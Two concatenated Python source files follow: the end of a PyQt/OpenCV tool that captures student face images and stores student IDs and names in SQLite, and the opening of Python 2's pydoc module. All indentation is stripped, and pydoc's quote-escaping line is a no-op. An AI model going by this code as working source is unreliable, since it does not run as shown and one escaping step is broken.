os.makedirs(self.datasets)
# Create the users table if it does not exist
# student ID, face ID, Chinese name, English name, creation date
cursor.execute('''CREATE TABLE IF NOT EXISTS users (
stu_id VARCHAR(12) PRIMARY KEY NOT NULL,
face_id INTEGER DEFAULT -1,
cn_name VARCHAR(10) NOT NULL,
en_name VARCHAR(16) NOT NULL,
created_time DATE DEFAULT (date('now','localtime'))
)
''')
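# face_id defaults to -1, presumably meaning "no trained face data yet";
# a separate training step is assumed to assign real IDs later.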
# Count the existing records
cursor.execute('SELECT Count(*) FROM users')
result = cursor.fetchone()
dbUserCount = result[0]  # current number of users
except Exception as e:
logging.error('读取数据库异常,无法完成数据库初始化')
self.isDbReady = False  # the database is not ready
self.initDbButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:初始化数据库失败')
else:
self.isDbReady = True  # the database is ready
self.dbUserCountLcdNum.display(dbUserCount)  # show how many users are stored
self.logQueue.put('Success:数据库初始化完成')
self.initDbButton.setIcon(QIcon('./icons/success.png'))
self.initDbButton.setEnabled(False)
self.addOrUpdateUserInfoButton.setEnabled(True)  # enable the add/update-user button
finally:
cursor.close()
conn.commit()
conn.close()
# Detect faces in a frame; called from updateFrame
def detectFace(self, frame):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)  # convert the frame to grayscale
faces = self.faceCascade.detectMultiScale(gray, 1.3, 5, minSize=(90, 90))  # run the Haar cascade face detector
stu_id = self.userInfo.get('stu_id')  # current user's student ID
for (x, y, w, h) in faces:
if self.isFaceRecordEnabled:  # capturing is enabled
try:
if not os.path.exists('{}/stu_{}'.format(self.datasets, stu_id)):
# create this student's dataset directory if it is missing
os.makedirs('{}/stu_{}'.format(self.datasets, stu_id))
if len(faces) > 1:  # more than one face in the frame
raise RecordDisturbance
# save the captured image
cv2.imwrite('{}/stu_{}/img.{}.jpg'.format(self.datasets, stu_id, self.faceRecordCount + 1),
gray[y - 20:y + h + 20, x - 20:x + w + 20])
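# Note: the 20 px margin above can yield an incorrect or empty crop when the
# face touches the frame edge, because negative NumPy indices wrap around;
# such failures end up in the generic except branch below.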
except RecordDisturbance:  # multiple faces or environmental interference
self.isFaceRecordEnabled = False
logging.error('检测到多张人脸或环境干扰')
self.logQueue.put('Warning:检测到多张人脸或环境干扰,请解决问题后继续')
self.enableFaceRecordButton.setIcon(QIcon('./icons/warning.png'))
continue
except Exception as e:  # any other error
logging.error('写入人脸图像文件到计算机过程中发生异常')
self.enableFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:无法保存人脸图像,采集当前捕获帧失败')
else:  # no exception occurred
self.enableFaceRecordButton.setIcon(QIcon('./icons/success.png'))
self.faceRecordCount = self.faceRecordCount + 1  # increment the sample count
self.isFaceRecordEnabled = False
self.faceRecordCountLcdNum.display(self.faceRecordCount)
cv2.rectangle(frame, (x - 5, y - 10), (x + w + 5, y + h + 10), (0, 0, 255), 2)  # draw a rectangle around the face
return frame  # return the annotated frame
# Add/update user info button handler
def addOrUpdateUserInfo(self):
self.userInfoDialog = UserInfoDialog()
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name')  # restore the last-entered user information
self.userInfoDialog.stuIDLineEdit.setText(stu_id)
self.userInfoDialog.cnNameLineEdit.setText(cn_name)
self.userInfoDialog.enNameLineEdit.setText(en_name)
self.userInfoDialog.okButton.clicked.connect(self.checkToApplyUserInfo)  # OK button click handler
self.userInfoDialog.exec()  # show the dialog
# Validate and apply the user info; OK button handler
def checkToApplyUserInfo(self):
if not (self.userInfoDialog.stuIDLineEdit.hasAcceptableInput() and
self.userInfoDialog.cnNameLineEdit.hasAcceptableInput() and
self.userInfoDialog.enNameLineEdit.hasAcceptableInput()):  # invalid input
self.userInfoDialog.msgLabel.setText('<font color=red>你的输入有误,提交失败,请检查并重试!</font>')
else:  # input is valid
# store the input in the userInfo dict
self.userInfo['stu_id'] = self.userInfoDialog.stuIDLineEdit.text().strip()
self.userInfo['cn_name'] = self.userInfoDialog.cnNameLineEdit.text().strip()
self.userInfo['en_name'] = self.userInfoDialog.enNameLineEdit.text().strip()
# confirm the information
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name')
self.stuIDLineEdit.setText(stu_id)  # show the student ID in the main UI
self.cnNameLineEdit.setText(cn_name)  # show the Chinese name in the main UI
self.enNameLineEdit.setText(en_name)  # show the English name in the main UI
self.isUserInfoReady = True  # user info is complete
if not self.startFaceRecordButton.isEnabled():  # capture may start now
self.startFaceRecordButton.setEnabled(True)
self.migrateToDbButton.setIcon(QIcon())
# close the dialog
self.userInfoDialog.close()
self.userInfoDialog.close()
# Sync-to-database button handler
def migrateToDb(self):
if self.isFaceDataReady:  # face data is ready
stu_id, cn_name, en_name = self.userInfo.get('stu_id'), self.userInfo.get('cn_name'), self.userInfo.get(
'en_name')  # fetch the student ID and names
conn = sqlite3.connect(self.database)
cursor = conn.cursor()
try:
cursor.execute('SELECT * FROM users WHERE stu_id=?', (stu_id,))
if cursor.fetchall():  # the user already exists
text = '数据库已存在学号为 <font color=blue>{}</font> 的用户记录。'.format(stu_id)
informativeText = '<b>是否覆盖?</b>'
ret = DataRecordUI.callDialog(QMessageBox.Warning, text, informativeText,
QMessageBox.Yes | QMessageBox.No)
if ret == QMessageBox.Yes:
# update the existing record
cursor.execute('UPDATE users SET cn_name=?, en_name=? WHERE stu_id=?',
(cn_name, en_name, stu_id,))
else:
raise OperationCancel  # the user declined to overwrite
else:  # the user is not in the database yet
# insert a new record
cursor.execute('INSERT INTO users (stu_id, cn_name, en_name) VALUES (?, ?, ?)',
(stu_id, cn_name, en_name,))
cursor.execute('SELECT Count(*) FROM users')
result = cursor.fetchone()
dbUserCount = result[0]  # refresh dbUserCount
except OperationCancel:
pass
except Exception as e:
logging.error('读写数据库异常,无法向数据库插入/更新记录')
self.migrateToDbButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:读写数据库异常,同步失败')
else:
text = '<font color=blue>{}</font> 已添加/更新到数据库。'.format(stu_id)
informativeText = '<b><font color=blue>{}</font> 的人脸数据采集已完成!</b>'.format(cn_name)
DataRecordUI.callDialog(QMessageBox.Information, text, informativeText, QMessageBox.Ok)
# clear the cached user info
for key in self.userInfo.keys():
self.userInfo[key] = ''
self.isUserInfoReady = False
self.faceRecordCount = 0
self.isFaceDataReady = False
self.faceRecordCountLcdNum.display(self.faceRecordCount)
self.dbUserCountLcdNum.display(dbUserCount)
# clear the previous input
self.stuIDLineEdit.clear()
self.cnNameLineEdit.clear()
self.enNameLineEdit.clear()
self.migrateToDbButton.setIcon(QIcon('./icons/success.png'))
# allow adding another user
self.addOrUpdateUserInfoButton.setEnabled(True)
self.migrateToDbButton.setEnabled(False)
finally:
cursor.close()
conn.commit()
conn.close()
else:
self.logQueue.put('Error:操作失败,你尚未完成人脸数据采集')
self.migrateToDbButton.setIcon(QIcon('./icons/error.png'))
# Start face capture button handler
def startFaceRecord(self, startFaceRecordButton):
if startFaceRecordButton.text() == '开始采集人脸数据':
if self.isFaceDetectEnabled:  # face detection is on
if self.isUserInfoReady:  # user info is ready
self.addOrUpdateUserInfoButton.setEnabled(False)  # disallow editing user info during capture
if not self.enableFaceRecordButton.isEnabled():  # enable the capture-frame button
self.enableFaceRecordButton.setEnabled(True)
self.enableFaceRecordButton.setIcon(QIcon())
self.startFaceRecordButton.setIcon(QIcon('./icons/success.png'))
self.startFaceRecordButton.setText('结束当前人脸采集')
else:  # user info is not ready
self.startFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.startFaceRecordButton.setChecked(False)
self.logQueue.put('Error:操作失败,系统未检测到有效的用户信息')
else:  # face detection is off
self.startFaceRecordButton.setIcon(QIcon('./icons/error.png'))
self.logQueue.put('Error:操作失败,请开启人脸检测')
else:  # the user clicked to finish capture
if self.faceRecordCount < self.minFaceRecordCount:  # too few samples captured
text = '系统当前采集了 <font color=blue>{}</font> 帧图像,采集数据过少会导致较大的识别误差。'.format(self.faceRecordCount)
informativeText = '<b>请至少采集 <font color=red>{}</font> 帧图像。</b>'.format(self.minFaceRecordCount)
DataRecordUI.callDialog(QMessageBox.Information, text, informativeText, QMessageBox.Ok)
else:  # enough samples have been captured
text = '系统当前采集了 <font color=blue>{}</font> 帧图像,继续采集可以提高识别准确率。'.format(self.faceRecordCount)
informativeText = '<b>你确定结束当前人脸采集吗?</b>'
ret = DataRecordUI.callDialog(QMessageBox.Question, text, informativeText,
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if ret == QMessageBox.Yes:
self.isFaceDataReady = True  # face data is ready
if self.isFaceRecordEnabled:  # stop any in-progress capture
self.isFaceRecordEnabled = False
self.enableFaceRecordButton.setEnabled(False)
self.enableFaceRecordButton.setIcon(QIcon())
self.startFaceRecordButton.setText('开始采集人脸数据')
self.startFaceRecordButton.setEnabled(False)
self.startFaceRecordButton.setIcon(QIcon())
self.migrateToDbButton.setEnabled(True)
# receiveLogSignal handler: append a log entry; log is a str
def logOutput(self, log):
# current system time
time = datetime.now().strftime('[%Y/%m/%d %H:%M:%S]')
log = time + ' ' + log + '\n'
self.logTextEdit.moveCursor(QTextCursor.End)
self.logTextEdit.insertPlainText(log)
self.logTextEdit.ensureCursorVisible()  # auto-scroll
# Pull entries from the log queue and emit receiveLogSignal so logOutput can print them
def receiveLog(self):
while True:
data = self.logQueue.get()  # block until a log entry arrives
if data:
self.receiveLogSignal.emit(data)  # emit the signal
else:
continue
# Display an image; called from updateFrame
def displayImage(self, img):
# BGR -> RGB
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# default: 8-bit indexes into a colormap, e.g. a grayscale image
qformat = QImage.Format_Indexed8  # grayscale by default
if len(img.shape) == 3: # rows[0], cols[1], channels[2]
if img.shape[2] == 4:  # 4 channels: RGB plus alpha
# The image is stored using a 32-bit byte-ordered RGBA format (8-8-8-8)
# A: alpha (opacity); a pixel whose alpha is 0% is fully transparent
qformat = QImage.Format_RGBA8888
else:  # 3 channels: RGB color
qformat = QImage.Format_RGB888
# img.shape[1]: width, img.shape[0]: height, img.shape[2]: channel count
# QImage.__init__ (self, bytes data, int width, int height, int bytesPerLine, Format format)
# Build a QImage straight from the in-memory buffer
# img.strides[0]: bytes per row (width*3 for RGB, width*4 for RGBA)
# strides[0] is the byte length of one row, strides[1] of one pixel,
# and strides[2] of one component: from the inside out, strides[2] is 1 byte (uint8),
# strides[1] is 3*1 bytes (3 RGB channels), and strides[0] is width*3 bytes
outImage = QImage(img, img.shape[1], img.shape[0], img.strides[0], qformat)
self.faceDetectCaptureLabel.setPixmap(QPixmap.fromImage(outImage))  # show the image
self.faceDetectCaptureLabel.setScaledContents(True)  # scale to fit
# System dialog helper
@staticmethod
def callDialog(icon, text, informativeText, standardButtons, defaultButton=None):
msg = QMessageBox()
msg.setWindowIcon(QIcon('./icons/icon.png'))
msg.setWindowTitle('OpenCV Face Recognition System - DataRecord')
msg.setIcon(icon)
msg.setText(text)
msg.setInformativeText(informativeText)
msg.setStandardButtons(standardButtons)
if defaultButton:
msg.setDefaultButton(defaultButton)
return msg.exec()
# Window close event: stop the timer and release the camera
def closeEvent(self, event):
if self.timer.isActive():
self.timer.stop()
if self.cap.isOpened():
self.cap.release()
event.accept()
if __name__ == '__main__':
logging.config.fileConfig('./config/logging.cfg')
app = QApplication(sys.argv)
window = DataRecordUI()
# window = UserInfoDialog()
window.show()
sys.exit(app.exec())
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <[email protected]>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
result = _encode(result)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
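# e.g. cram('abcdefghij', 8) -> 'ab...hij' (2 leading + 3 trailing chars)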
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
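# e.g. stripid('<Foo instance at 0x00b3e1d0>') -> '<Foo instance>'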
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- Unicode support helpers
try:
_unicode = unicode
except NameError:
# If Python is built without Unicode support, the unicode type
# will not exist. Fake one that nothing will match, and make
# the _encode function a no-op.
class _unicode(object):
pass
_encoding = 'ascii'
def _encode(text, encoding='ascii'):
return text
else:
import locale
_encoding = locale.getpreferredencoding()
def _encode(text, encoding=None):
if isinstance(text, unicode):
return text.encode(encoding or _encoding, 'xmlcharrefreplace')
else:
return text
def _binstr(obj):
# Ensure that we have an encoded (binary) string representation of obj,
# even if it is a unicode string.
if isinstance(obj, _unicode):
return obj.encode(_encoding, 'xmlcharrefreplace')
return str(obj)
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
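# The pattern links plain-text references such as 'http://...' URLs,
# 'RFC 2822', 'PEP 328', and 'self.name' attribute/method mentions.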
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
